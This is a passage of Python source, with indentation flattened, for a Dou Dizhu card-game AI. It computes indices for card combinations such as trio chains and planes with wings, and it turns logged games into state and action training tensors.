cards_rank_all.index(wing_3_single)):
index += int((9 - i) * (8 - i) / 2)
for i in range(
cards_rank_all.index(wing_3_single) + 1,
cards_rank_all.index(wing_4_single)):
if i < cards_rank_all.index(plane_small_head):
index += (9 - i)
elif i > cards_rank_all.index(plane_big_head):
index += (14 - i)
else:
pass
index += (
cards_rank_all.index(wing_5_single) -
cards_rank_all.index(wing_4_single)
)
return index, True
elif isTrioChain_4:
plane_small_head = card_list[17]
plane_big_head = card_list[3]
wing_1_single = card_list[19]
wing_2_single = card_list[18]
wing_3_single = card_list[2]
wing_4_single = card_list[1]
wing_5_single = card_list[0]
index = 858 + 2200 + 2970
index += cards_rank_simple.index(plane_small_head) * 252
for i in range(0, cards_rank_all.index(wing_1_single)):
# C_(15 - 5 - i - 1)_4
index += int((9 - i) * (8 - i) * (7 - i) * (6 - i) / 24)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((9 - i) * (8 - i) * (7 - i) / 6)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
if i < cards_rank_all.index(plane_small_head):
index += int((9 - i) * (8 - i) / 2)
elif i > cards_rank_all.index(plane_big_head):
index += int((14 - i) * (13 - i) / 2)
else:
pass
for i in range(
cards_rank_all.index(wing_3_single) + 1,
cards_rank_all.index(wing_4_single)):
index += (14 - i)
index += (
cards_rank_all.index(wing_5_single) -
cards_rank_all.index(wing_4_single)
)
return index, True
elif isTrioChain_5:
plane_small_head = card_list[14]
plane_big_head = card_list[0]
wing_1_single = card_list[19]
wing_2_single = card_list[18]
wing_3_single = card_list[17]
wing_4_single = card_list[16]
wing_5_single = card_list[15]
index = 858 + 2200 + 2970
index += cards_rank_simple.index(plane_small_head) * 252
for i in range(0, cards_rank_all.index(wing_1_single)):
# C_(15 - 5 - i - 1)_4
index += int((9 - i) * (8 - i) * (7 - i) * (6 - i) / 24)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
if i < cards_rank_all.index(plane_small_head):
index += int((9 - i) * (8 - i) * (7 - i) / 6)
elif i > cards_rank_all.index(plane_big_head):
index += int((14 - i) * (13 - i) * (12 - i) / 6)
else:
pass
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
index += int((14 - i) * (13 - i) / 2)
for i in range(
cards_rank_all.index(wing_3_single) + 1,
cards_rank_all.index(wing_4_single)):
index += (14 - i)
index += (
cards_rank_all.index(wing_5_single) -
cards_rank_all.index(wing_4_single)
)
return index, True
elif isTrioChain_6:
plane_small_head = card_list[14]
plane_big_head = card_list[0]
wing_1_single = card_list[19]
wing_2_single = card_list[18]
wing_3_single = card_list[17]
wing_4_single = card_list[16]
wing_5_single = card_list[15]
index = 858 + 2200 + 2970
index += cards_rank_simple.index(plane_small_head) * 252
for i in range(0, cards_rank_all.index(wing_1_single)):
# C_(15 - 5 - i - 1)_4
index += int((9 - i) * (8 - i) * (7 - i) * (6 - i) / 24)
if i < cards_rank_all.index(plane_small_head):
index += int((9 - i) * (8 - i) * (7 - i) * (6 - i) / 24)
elif i > cards_rank_all.index(plane_big_head):
index += int(
(14 - i) * (13 - i) * (12 - i) * (11 - i) / 24)
else:
pass
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((14 - i) * (13 - i) * (12 - i) / 6)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
index += int((14 - i) * (13 - i) / 2)
for i in range(
cards_rank_all.index(wing_3_single) + 1,
cards_rank_all.index(wing_4_single)):
index += (14 - i)
index += (
cards_rank_all.index(wing_5_single) -
cards_rank_all.index(wing_4_single)
)
return index, True
else:
return -1, False
else:
return -1, False
def is_planeDoubleWing(card_list):
r""" discuss whether a card)_list is a plane with wings(double) and calc index
Plane with Wings(double) need a Trio-Chain to be main group, and
same amout of double cards as the Trio num of the Trio-Chain to be Wings.
Args:
card_list: a list of cards
Returns:
index: the index of the plane in this kind of combs, starts from 1
Boolen: Whether this card_list is planeDoubleWing
"""
cards_rank_simple = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2'
]
cards_rank_all = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2', 'X', 'D'
]
if len(card_list) == 10:
index_1, isTrioChain_1 = is_trioChain(card_list[0:6])
index_2, isTrioChain_2 = is_trioChain(card_list[2:8])
index_3, isTrioChain_3 = is_trioChain(card_list[4:10])
if isTrioChain_1:
if (
card_list[9] != card_list[8] or
card_list[7] != card_list[6] or
not card_list[9] != card_list[7]):
return -1, False
plane_small_head = card_list[5]
plane_big_head = card_list[0]
wing_1_double = card_list[9]
wing_2_double = card_list[7]
index = cards_rank_simple.index(plane_small_head) * 55
for i in range(0, cards_rank_simple.index(wing_1_double)):
index += (10 - i)
index += (
cards_rank_simple.index(wing_2_double) -
cards_rank_simple.index(wing_1_double)
)
return index, True
elif isTrioChain_2:
if (
card_list[9] != card_list[8] or
card_list[1] != card_list[0]):
return -1, False
plane_small_head = card_list[7]
plane_big_head = card_list[2]
wing_1_double = card_list[9]
wing_2_double = card_list[0]
index = cards_rank_simple.index(plane_small_head) * 55
for i in range(0, cards_rank_simple.index(wing_1_double)):
index += (10 - i)
index += (
cards_rank_all.index(wing_2_double) -
cards_rank_all.index(wing_1_double) - 2
)
return index, True
elif isTrioChain_3:
if (
card_list[3] != card_list[2] or
card_list[1] != card_list[0] or
not card_list[3] != card_list[1]):
return -1, False
plane_small_head = card_list[9]
plane_big_head = card_list[4]
wing_1_double = card_list[3]
wing_2_double = card_list[1]
index = cards_rank_simple.index(plane_small_head) * 55
for i in range(0, cards_rank_simple.index(wing_1_double)):
if i < cards_rank_simple.index(plane_small_head):
index += (10 - i)
elif i > cards_rank_simple.index(plane_big_head):
index += (12 - i)
else:
pass
index = (
cards_rank_simple.index(wing_2_double) -
cards_rank_simple.index(wing_1_double)
)
return index, True
return -1, False
elif len(card_list) == 15:
index_1, isTrioChain_1 = is_trioChain(card_list[0:9])
index_2, isTrioChain_2 = is_trioChain(card_list[2:11])
index_3, isTrioChain_3 = is_trioChain(card_list[4:13])
index_4, isTrioChain_4 = is_trioChain(card_list[6:15])
if isTrioChain_1:
plane_small_head = card_list[8]
plane_big_head = card_list[0]
wing_1_double = card_list[13]
wing_2_double = card_list[11]
wing_3_double = card_list[9]
index = 605 + cards_rank_simple.index(plane_small_head) * 120
for i in range(0, cards_rank_simple.index(wing_1_double)):
# C_(13-3-i-1)_2
index += int((9 - i) * (8 - i) / 2)
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
index += (9 - i)
index += (
cards_rank_simple.index(wing_3_double) -
cards_rank_simple.index(wing_2_double)
)
return index, True
elif isTrioChain_2:
plane_small_head = card_list[10]
plane_big_head = card_list[2]
wing_1_double = card_list[13]
wing_2_double = card_list[11]
wing_3_double = card_list[0]
index = 605 + cards_rank_simple.index(plane_small_head) * 120
for i in range(0, cards_rank_simple.index(wing_1_double)):
index += int((9 - i) * (8 - i) / 2)
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
index += (9 - i)
index += (
cards_rank_simple.index(wing_3_double) -
cards_rank_simple.index(wing_2_double) - 3
)
return index, True
elif isTrioChain_3:
plane_small_head = card_list[12]
plane_big_head = card_list[4]
wing_1_double = card_list[13]
wing_2_double = card_list[2]
wing_3_double = card_list[0]
index = 605 + cards_rank_simple.index(plane_small_head) * 120
for i in range(0, cards_rank_simple.index(wing_1_double)):
index += int((9 - i) * (8 - i) / 2)
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
if i < cards_rank_simple.index(plane_small_head):
index += (13 - 3 - i - 1)
elif i > cards_rank_simple.index(plane_big_head):
index += (13 - i - 1)
else:
pass
index += (
cards_rank_simple.index(wing_3_double) -
cards_rank_simple.index(wing_2_double)
)
return index, True
elif isTrioChain_4:
plane_small_head = card_list[14]
plane_big_head = card_list[6]
wing_1_double = card_list[4]
wing_2_double = card_list[2]
wing_3_double = card_list[0]
index = 605 + cards_rank_simple.index(plane_small_head) * 120
for i in range(0, cards_rank_simple.index(wing_1_double)):
if i < cards_rank_simple.index(plane_small_head):
index += int((13 - 3 - i - 1) * (13 - 3 - i - 2) / 2)
elif i > cards_rank_simple.index(plane_big_head):
index += int((13 - i - 1) * (13 - i - 2) / 2)
else:
pass
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
index += (13 - i - 1)
index += (
cards_rank_simple.index(wing_3_double) -
cards_rank_simple.index(wing_2_double)
)
return index, True
else:
return -1, False
elif len(card_list) == 20:
index_1, isTrioChain_1 = is_trioChain(card_list[0:12])
index_2, isTrioChain_2 = is_trioChain(card_list[2:14])
index_3, isTrioChain_3 = is_trioChain(card_list[4:16])
index_4, isTrioChain_4 = is_trioChain(card_list[6:18])
index_5, isTrioChain_5 = is_trioChain(card_list[8:20])
if isTrioChain_1:
plane_small_head = card_list[11]
plane_big_head = card_list[0]
wing_1_double = card_list[18]
wing_2_double = card_list[16]
wing_3_double = card_list[14]
wing_4_double = card_list[12]
# 1805 = 605 + 1200
index = 1805 + cards_rank_simple.index(plane_small_head) * 126
for i in range(0, cards_rank_simple.index(wing_1_double)):
# C_(13-4-i-1)_3
index += int((8 - i) * (7 - i) * (6 - i) / 6)
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
index += int((8 - i) * (7 - i) / 2)
for i in range(
cards_rank_simple.index(wing_2_double) + 1,
cards_rank_simple.index(wing_3_double)):
index += (8 - i)
index += (
cards_rank_simple.index(wing_4_double) -
cards_rank_simple.index(wing_3_double)
)
return index, True
elif isTrioChain_2:
plane_small_head = card_list[13]
plane_big_head = card_list[2]
wing_1_double = card_list[18]
wing_2_double = card_list[16]
wing_3_double = card_list[14]
wing_4_double = card_list[0]
index = 1805 + cards_rank_simple.index(plane_small_head) * 126
for i in range(0, cards_rank_simple.index(wing_1_double)):
# C_(13-4-i-1)_3
index += int((8 - i) * (7 - i) * (6 - i) / 6)
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
index += int((8 - i) * (7 - i) / 2)
for i in range(
cards_rank_simple.index(wing_2_double) + 1,
cards_rank_simple.index(wing_3_double)):
index += (8 - i)
index += (
cards_rank_simple.index(wing_4_double) -
cards_rank_simple.index(wing_3_double) - 4
)
return index, True
elif isTrioChain_3:
plane_small_head = card_list[15]
plane_big_head = card_list[4]
wing_1_double = card_list[18]
wing_2_double = card_list[16]
wing_3_double = card_list[2]
wing_4_double = card_list[0]
index = 1805 + cards_rank_simple.index(plane_small_head) * 126
for i in range(0, cards_rank_simple.index(wing_1_double)):
# C_(13-4-i-1)_3
index += int((8 - i) * (7 - i) * (6 - i) / 6)
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
index += int((8 - i) * (7 - i) / 2)
for i in range(
cards_rank_simple.index(wing_2_double) + 1,
cards_rank_simple.index(wing_3_double)):
if i < cards_rank_simple.index(plane_small_head):
index += (8 - i)
elif i > cards_rank_simple.index(plane_big_head):
index += (12 - i)
else:
pass
index += (
cards_rank_simple.index(wing_4_double) -
cards_rank_simple.index(wing_3_double)
)
return index, True
elif isTrioChain_4:
plane_small_head = card_list[17]
plane_big_head = card_list[6]
wing_1_double = card_list[18]
wing_2_double = card_list[4]
wing_3_double = card_list[2]
wing_4_double = card_list[0]
index = 1805 + cards_rank_simple.index(plane_small_head) * 126
for i in range(0, cards_rank_simple.index(wing_1_double)):
# C_(13-4-i-1)_3
index += int((8 - i) * (7 - i) * (6 - i) / 6)
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
if i < cards_rank_simple.index(plane_small_head):
index += int((8 - i) * (7 - i) / 2)
elif i > cards_rank_simple.index(plane_big_head):
index += int((12 - i) * (11 - i) / 2)
else:
pass
for i in range(
cards_rank_simple.index(wing_2_double) + 1,
cards_rank_simple.index(wing_3_double)):
index += (12 - i)
index += (
cards_rank_simple.index(wing_4_double) -
cards_rank_simple.index(wing_3_double)
)
return index, True
elif isTrioChain_5:
plane_small_head = card_list[19]
plane_big_head = card_list[8]
wing_1_double = card_list[6]
wing_2_double = card_list[4]
wing_3_double = card_list[2]
wing_4_double = card_list[0]
index = 1805 + cards_rank_simple.index(plane_small_head) * 126
for i in range(0, cards_rank_simple.index(wing_1_double)):
if i < cards_rank_simple.index(plane_small_head):
index += int((8 - i) * (7 - i) * (6 - i) / 6)
elif i > cards_rank_simple.index(plane_big_head):
index += int((12 - i) * (11 - i) * (10 - i) / 6)
else:
pass
for i in range(
cards_rank_simple.index(wing_1_double) + 1,
cards_rank_simple.index(wing_2_double)):
index += int((12 - i) * (11 - i) / 2)
for i in range(
cards_rank_simple.index(wing_2_double) + 1,
cards_rank_simple.index(wing_3_double)):
index += (12 - i)
index += (
cards_rank_simple.index(wing_4_double) -
cards_rank_simple.index(wing_3_double)
)
return index, True
else:
return -1, False
def label_str2int(label_str):
r""" Generate the int-style card_combs from str-comb
The total elements of card_combs is 13707 (contains PASS).
When training in neural networks, the label and output of the NN
should be one-hot tensors. Thus, when doing training, the output
needed to be coverted from str to int (index), one-hot is not necessary.
Args:
label_str: the str-style of the specific cards_comb
Returns:
index: the int index (0 - 13550) of that specific cards_comb
index_cur: the int index among this category of combs
descip: the kind of combs
"""
cards_rank_simp = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2'
]
cards_rank_all = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2', 'X', 'D'
]
label_list = split_handcards(label_str)
if label_str == 'P':
# Pass
# num_Pass = 1
return 0, 0, 'Pass'
elif label_str == 'DX' or label_str == 'XD':
# Rocket
# num_Rocket = 1
return 1, 0, 'Rocket'
elif len(label_list) == 1 and label_list[0] in cards_rank_all:
# Single
# num_Single = 15
index = cards_rank_all.index(label_list[0])
# num_Pass + num_Rocket
return 2 + index, index, 'Single'
elif len(label_list) == 2 and label_list[0] == label_list[1]:
# Double
if label_list[0] not in cards_rank_simp:
raise ValueError(
'Double should be among 3-2, got {}'.format(label_str)
)
else:
# num_Double = 13
index = cards_rank_simp.index(label_list[0])
# num_Pass + num_Rocket + num_Single
return 17 + index, index, 'Double'
elif (len(label_list) == 3 and
label_list[0] == label_list[1] == label_list[2]):
# Trio
if label_list[0] not in cards_rank_simp:
raise ValueError(
'Trio should be among 3-2, got {}'.format(label_str)
)
else:
# num_Trio = 13
index = cards_rank_simp.index(label_list[0])
# num_Pass + num_Rocket + num_Single + num_Double
return 30 + index, index, 'Trio'
elif (len(label_list) == 4 and
label_list[0] == label_list[1] == label_list[2] == label_list[3]):
# Bomb
if label_list[0] not in cards_rank_simp:
raise ValueError(
'Bomb should be among 3-2, got {}'.format(label_str)
)
else:
# num_Bomb = 13
index = cards_rank_simp.index(label_list[0])
# sigma previous number
return 43 + index, index, 'Bomb'
elif (len(label_list) == 4 and
(label_list[0] == label_list[1] == label_list[2] or
label_list[1] == label_list[2] == label_list[3])):
# Trio + Single, total num: 182
main_group_num = ''
kicker_single_num = ''
# The four-cards' rank is descending
if label_list[0] == label_list[1] == label_list[2]:
# kicker < main group
if label_list[0] not in cards_rank_simp:
raise ValueError(
'Trio Main Group should be among 3-2, got {}'
.format(label_str)
)
else:
main_group_num = label_list[0]
kicker_single_num = label_list[3]
# calculate two-parts' index
index_main = cards_rank_simp.index(main_group_num)
index_kicker = cards_rank_all.index(kicker_single_num)
return (
56 + index_main * 14 + index_kicker,
index_main * 14 + index_kicker, 'Trio1Single')
elif label_list[1] == label_list[2] == label_list[3]:
# kicker > main group
if label_list[1] not in cards_rank_simp:
raise ValueError(
'Trio Main Group should be among 3-2, got {}'
.format(label_str)
)
else:
main_group_num = label_list[1]
kicker_single_num = label_list[0]
# calculate two-part's index
index_main = cards_rank_simp.index(main_group_num)
index_kicker = cards_rank_all.index(kicker_single_num)
return (
56 + index_main * 14 + index_kicker - 1,
index_main * 14 + index_kicker - 1, 'Trio1Single')
else:
raise ValueError(
'Need Descending sort Pokers, got {}'
.format(label_str)
)
elif (
len(label_list) == 5 and
(
(
label_list[0] == label_list[1] == label_list[2] and
label_list[3] == label_list[4]) or
(
label_list[2] == label_list[3] == label_list[4] and
label_list[0] == label_list[1]))):
# Trio + Double, total num: 156
main_group_num = ''
kicker_double_num = ''
# The five-cards' rank is descending
if label_list[0] == label_list[1] == label_list[2]:
# kicker < main group
if label_list[0] not in cards_rank_simp:
raise ValueError(
'Trio Main Group should be among 3-2, got {}'
.format(label_str)
)
elif label_list[3] not in cards_rank_simp:
raise ValueError(
'Trio Kicker Group should be among 3-2, got {}'
.format(label_str)
)
else:
main_group_num = label_list[0]
kicker_double_num = label_list[3]
# calculate two-parts' index
index_main = cards_rank_simp.index(main_group_num)
index_kicker = cards_rank_simp.index(kicker_double_num)
return (
238 + index_main * 12 + index_kicker,
index_main * 12 + index_kicker, 'Trio1Double')
elif label_list[2] == label_list[3] == label_list[4]:
# kicker > main group
if label_list[2] not in cards_rank_simp:
raise ValueError(
'Trio Main Group should be among 3-2, got {}'
.format(label_str)
)
elif label_list[0] not in cards_rank_simp:
raise ValueError(
'Trio Kicker Group should be among 3-2, got {}'
.format(label_str)
)
else:
main_group_num = label_list[2]
kicker_double_num = label_list[0]
# calculate two-part's index
index_main = cards_rank_simp.index(main_group_num)
index_kicker = cards_rank_simp.index(kicker_double_num)
return (
238 + index_main * 12 + index_kicker - 1,
index_main * 12 + index_kicker - 1, 'Trio1Double')
else:
indexSingleChain, isSingleChain = is_singleChain(label_list)
if isSingleChain:
return 394 + indexSingleChain, indexSingleChain, 'SingleChain'
indexDoubleChain, isDoubleChain = is_doubleChain(label_list)
if isDoubleChain:
return 430 + indexDoubleChain, indexDoubleChain, 'DoubleChain'
indexTrioChain, isTrioChain = is_trioChain(label_list)
if isTrioChain:
return 482 + indexTrioChain, indexTrioChain, 'TrioChain'
indexQuadr2Single, isQuadr2Single = is_quadr2single(label_list)
if isQuadr2Single:
return (
527 + indexQuadr2Single - 1,
indexQuadr2Single - 1, 'Quadr2Single')
indexQuadr2Double, isQuadr2Double = is_quadr2double(label_list)
if isQuadr2Double:
return (
1866 + indexQuadr2Double - 1,
indexQuadr2Double - 1, 'Quadr2Double')
(indexPlaneSingleWing,
isPlaneSingleWing) = is_planeSingleWing(label_list)
if isPlaneSingleWing:
return (
2724 + indexPlaneSingleWing - 1,
indexPlaneSingleWing - 1, 'PlaneSingleWing')
(indexPlaneDoubleWing,
isPlaneDoubleWing) = is_planeDoubleWing(label_list)
if isPlaneDoubleWing:
return (
10768 + indexPlaneDoubleWing - 1,
indexPlaneDoubleWing - 1, 'PlaneDoubleWing')
else:
raise ValueError(
'cards comb mismatched! got {}'
.format(label_str)
)
def label_int2str(cards_int):
r""" Generate the str-style card_combs from int index
The total elements of card_combs is 13707 (contains PASS).
When training in neural networks, the label and output of the NN
should be one-hot tensors. Thus, when doing inference, the output
needed to be coverted from one-hot tensor (or just index) to str.
Args:
cards_int: the index(int) of the specific cards_comb
Returns:
cards_str: the str-style of that specific cards_comb
list_index: the int-index list of 15 column of cards_comb
"""
# TODO: implement this!!!
# Don't Need to Calculate, just generate a csv file
# which contains all kinds of card_comb
all_combs = pd.read_csv('./patterns.csv')
cards_combs = all_combs.iloc[cards_int]['3':'15']
list_index = list(cards_combs)
cards_str = all_combs.iloc[cards_int]['key']
return cards_str, list_index
def generate_game_process(
landlord, landlord_down, landlord_up,
public, game_process, game_winner):
r""" Generate Game State before each play of the winner
Args:
landlord: list of init handcards
landlord_down: list of init handcards
landlord_up: list of init handcards
public: list of init public cards
game_process:
game_winner:
Return:
steps_data: list of 3-dim numpy array
steps_label: list of labels (string)
steps_label_index: list of labels (int)
"""
# Save state data and label here
steps_data = []
steps_label = []
steps_label_index = []
# Save (state, action) pairs here
state_action_pair = []
state_action_label = []
# temporary multi-state-features
landlord_public = public
landlord_played = []
landlord_down_played = []
landlord_up_played = []
landlord_last_played = []
landlord_down_last_played = []
landlord_up_last_played = []
# Only the winner's handcard could be known, Otherwise remain empty
landlord_handcard = []
landlord_down_handcard = []
landlord_up_handcard = []
# Whether if the winner is landlord / landlord_down / landlord_up
# What cards haven't been played
# if there is a trio in the winner's handcard
if game_winner == '0':
# NOTE: landlord's handcard should also contain public cards
landlord_handcard = landlord + public
elif game_winner == '1':
landlord_down_handcard = landlord_down.copy()
elif game_winner == '2':
landlord_up_handcard = landlord_up.copy()
else:
raise ValueError(
'game winner can only be (char)0, 1, 2, got {}'
.format(game_winner)
)
# Game Process for each step
(landlord_steps, landlord_down_steps,
landlord_up_steps) = game_process_with_pass(game_process)
# check whether the PASS added accurately
if game_winner == '0':
if len(landlord_steps) != len(landlord_down_steps) + 1:
raise ValueError('generated steps with PASS has incorrect size')
elif len(landlord_down_steps) != len(landlord_up_steps):
raise ValueError('generated steps with PASS has incorrect size')
elif game_winner == '1':
if len(landlord_down_steps) != len(landlord_up_steps) + 1:
raise ValueError('generated steps with PASS has incorrect size')
elif len(landlord_steps) != len(landlord_down_steps):
raise ValueError('generated steps with PASS has incorrect size')
elif game_winner == '2':
if len(landlord_steps) != len(landlord_up_steps):
raise ValueError('generated steps with PASS has incorrect size')
elif len(landlord_steps) != len(landlord_down_steps):
raise ValueError('generated steps with PASS has incorrect size')
if game_winner == '0':
for i in range(0, len(landlord_steps)):
plane_0 = cards_rank_encode(landlord_public)
plane_1 = cards_rank_encode(landlord_played)
plane_2 = cards_rank_encode(landlord_down_played)
plane_3 = cards_rank_encode(landlord_up_played)
plane_4 = cards_rank_encode(landlord_last_played)
plane_5 = cards_rank_encode(landlord_down_last_played)
plane_6 = cards_rank_encode(landlord_up_last_played)
plane_7 = cards_rank_encode(landlord_handcard)
plane_8 = cards_rank_encode(landlord_down_handcard)
plane_9 = cards_rank_encode(landlord_up_handcard)
# stack planes -> C * H * W
step_data = np.stack(
(plane_0, plane_1, plane_2, plane_3, plane_4,
plane_5, plane_6, plane_7, plane_8, plane_9), axis=0
)
# Get winner's current playing cards as label
step_label = landlord_steps[i]
# print('process: {}'.format(step_label))
step_label_index, _, _ = label_str2int(step_label)
steps_data.append(step_data)
steps_label.append(step_label)
steps_label_index.append(step_label_index)
# TODO: Implement this!
# NOTE: this section indicate that we should concern actions
# and combine them with state to generate (s,a) pairs
# NOTE: should have positive and negative data, which means that
# the data pair of two which would be saved and loaded should
# sometimes see the real-play-out combs in the front,
# sometimes see it behind
# get valid actions
cur_cards_left = cards_rank_encode_np(landlord_handcard)
if landlord_up_last_played != ['P']:
game_last_move = cards_rank_encode_np(
landlord_up_last_played
)
# print(
# 'Game_last_move is landlord_up, played:{}'
# .format(landlord_up_last_played)
# )
elif landlord_down_last_played != ['P']:
game_last_move = cards_rank_encode_np(
landlord_down_last_played
)
# print(
# 'Game_last_move is landlord_down, played: {}'
# .format(landlord_down_last_played)
# )
else:
# Then, the landlord should start a new series of combs
game_last_move = np.zeros(15, dtype=int)
# print(
# 'Game_last_move is landlord, '
# 'landlord_up: {}'
# 'landlord_down: {}'
# .format(
# landlord_up_last_played, landlord_down_last_played)
# )
moves = get_moves(cur_cards_left, game_last_move)
# print(
# 'Generated a list of vaid moves. num: {}'
# .format(len(moves))
# )
# print(
# 'The Valid moves are as below: {}'
# .format(moves)
# )
step_label_np = cards_rank_encode_np(split_handcards(step_label))
ans_index = findByRow(moves, step_label_np)
if len(ans_index) == 0:
# moves from get_moves doesn't include ans_index
print(
'step label: {} dose not belong to moves'
.format(step_label_np)
)
pass
elif len(ans_index) == 1:
for i_m, move in enumerate(moves):
if (move == ans_index).all():
pass
else:
# Add (state, action) pairs
flip_gate = random.random()
if flip_gate <= 0.5:
# rank1(True Label) < rank2
action_1 = cards_rank_encode(split_handcards(
step_label))
action_2 = cards_rank_encode_np2bi(move)
pair_label = 1
else:
# rank1 > rank2(True Label)
action_1 = cards_rank_encode_np2bi(move)
action_2 = cards_rank_encode(split_handcards(
step_label))
pair_label = -1
state_action_pair_1 = np.concatenate(
(step_data, [action_1]), axis=0
)
state_action_pair_2 = np.concatenate(
(step_data, [action_2]), axis=0
)
state_action_pair.append(
np.stack(
(state_action_pair_1, state_action_pair_2),
axis=0
)
)
state_action_label.append(
pair_label
)
else:
raise ValueError(
'there should be only 1 matched step_label in moves, '
'got: {}'
.format(len(ans_index))
)
# Check whether the game is end or not
if i == len(landlord_steps) - 1:
pass
else:
# player's last played cards
# NOTE: Here I also put PASS into the cards played records
landlord_played.extend(
split_handcards(landlord_steps[i])
)
landlord_down_played.extend(
split_handcards(landlord_down_steps[i])
)
landlord_up_played.extend(
split_handcards(landlord_up_steps[i])
)
landlord_last_played = split_handcards(
landlord_steps[i]
)
landlord_down_last_played = split_handcards(
landlord_down_steps[i]
)
landlord_up_last_played = split_handcards(
landlord_up_steps[i]
)
# calculate landlord's current handcards
for elem in landlord_last_played:
if elem != 'P':
landlord_handcard.remove(elem)
elif game_winner == '1':
# landlord should have played one step before player '1'
landlord_played = split_handcards(landlord_steps[0])
landlord_last_played = split_handcards(landlord_steps[0])
# As game_winner is '1', I couldn't know landlord's handcard
for i in range(0, len(landlord_down_steps)):
plane_0 = cards_rank_encode(landlord_public)
plane_1 = cards_rank_encode(landlord_played)
plane_2 = cards_rank_encode(landlord_down_played)
plane_3 = cards_rank_encode(landlord_up_played)
plane_4 = cards_rank_encode(landlord_last_played)
plane_5 = cards_rank_encode(landlord_down_last_played)
plane_6 = cards_rank_encode(landlord_up_last_played)
plane_7 = cards_rank_encode(landlord_handcard)
plane_8 = cards_rank_encode(landlord_down_handcard)
plane_9 = cards_rank_encode(landlord_up_handcard)
# stack planes -> C * H * W
step_data = np.stack(
(plane_0, plane_1, plane_2, plane_3, plane_4,
plane_5, plane_6, plane_7, plane_8, plane_9), axis=0
)
# Get winner's current playing cards as label
step_label = landlord_down_steps[i]
step_label_index, _, _ = label_str2int(step_label)
steps_data.append(step_data)
steps_label.append(step_label)
steps_label_index.append(step_label_index)
# check whether the game is end or not
if i == len(landlord_down_steps) - 1:
pass
else:
# player's last played cards
# NOTE: Here I also put PASS into the cards played records
landlord_played.extend(
split_handcards(landlord_steps[i + 1])
)
landlord_down_played.extend(
split_handcards(landlord_down_steps[i])
)
landlord_up_played.extend(
split_handcards(landlord_up_steps[i])
)
landlord_last_played = split_handcards(
landlord_steps[i + 1]
)
landlord_down_last_played = split_handcards(
landlord_down_steps[i]
)
landlord_up_last_played = split_handcards(
landlord_up_steps[i]
)
# calculate landlord_down's current handcards
for elem in landlord_down_last_played:
if elem != 'P':
landlord_down_handcard.remove(elem)
elif game_winner == '2':
# landlord should have played one step before player '1'
landlord_played = split_handcards(landlord_steps[0])
landlord_last_played = split_handcards(landlord_steps[0])
# As game_winner is '2', I couldn't know landlord's handcard
# landlord_down should have played one step before player '2'
landlord_down_played = split_handcards(landlord_down_steps[0])
landlord_down_last_played = split_handcards(landlord_down_steps[0])
# As game_winner is '2', I couldn't know landlord_down's handcard
for i in range(0, len(landlord_up_steps)):
plane_0 = cards_rank_encode(landlord_public)
plane_1 = cards_rank_encode(landlord_played)
plane_2 = cards_rank_encode(landlord_down_played)
plane_3 = cards_rank_encode(landlord_up_played)
plane_4 = cards_rank_encode(landlord_last_played)
plane_5 = cards_rank_encode(landlord_down_last_played)
plane_6 = cards_rank_encode(landlord_up_last_played)
plane_7 = cards_rank_encode(landlord_handcard)
plane_8 = cards_rank_encode(landlord_down_handcard)
plane_9 = cards_rank_encode(landlord_up_handcard)
# stack planes -> C * H * W
step_data = np.stack(
(plane_0, plane_1, plane_2, plane_3, plane_4,
plane_5, plane_6, plane_7, plane_8, plane_9), axis=0
)
# Get winner's current playing cards as label
step_label = landlord_up_steps[i]
step_label_index, _, _ = label_str2int(step_label)
steps_data.append(step_data)
steps_label.append(step_label)
steps_label_index.append(step_label_index)
# check whether the game is end or not
if i == len(landlord_up_steps) - 1:
pass
else:
# player's last played cards
# NOTE: Here I also put PASS into the cards played records
landlord_played.extend(
split_handcards(landlord_steps[i + 1])
)
landlord_down_played.extend(
split_handcards(landlord_down_steps[i + 1])
)
landlord_up_played.extend(
split_handcards(landlord_up_steps[i])
)
landlord_last_played = split_handcards(
landlord_steps[i + 1]
)
landlord_down_last_played = split_handcards(
landlord_down_steps[i + 1]
)
landlord_up_last_played = split_handcards(
landlord_up_steps[i]
)
# calculate landlord_up's current handcards
for elem in landlord_up_last_played:
if elem != 'P':
landlord_up_handcard.remove(elem)
return (
steps_data, steps_label, steps_label_index,
state_action_pair, state_action_label)
if __name__ == "__main__":
r""" Main Function of DataLoader
Need to make Unit-Test for the cards_comb's str2int part
"""
with open(opt.inputFile, 'rt') as f_1:
cnt_line = 0
cnt_npy = 1
cnt_sa_npy = 1
np_array_data = None
np_array_label = None
np_array_flag = False
np_array_data_left = None
np_array_label_left = None
np_sa_data = None
np_sa_label = None
np_sa_flag = False
np_sa_data_left = None
np_sa_label_left = None
for line in f_1:
if cnt_line == opt.train_num:
break
cnt_line += 1
# Got Game Process
cards = line.split(' Game process:')[0]
# Got cards parts
cards = cards.strip('Cards:')
# Got Game Process
game_process = line.split(' Game process:')[1].strip('\n')
# split four parts of the cards records
cards_landlord = cards.split(';')[0]
cards_landlord_down = cards.split(';')[1]
cards_landlord_up = cards.split(';')[2]
cards_landlord_public = cards.split(';')[-1]
# split string structures of the card series into seperate list
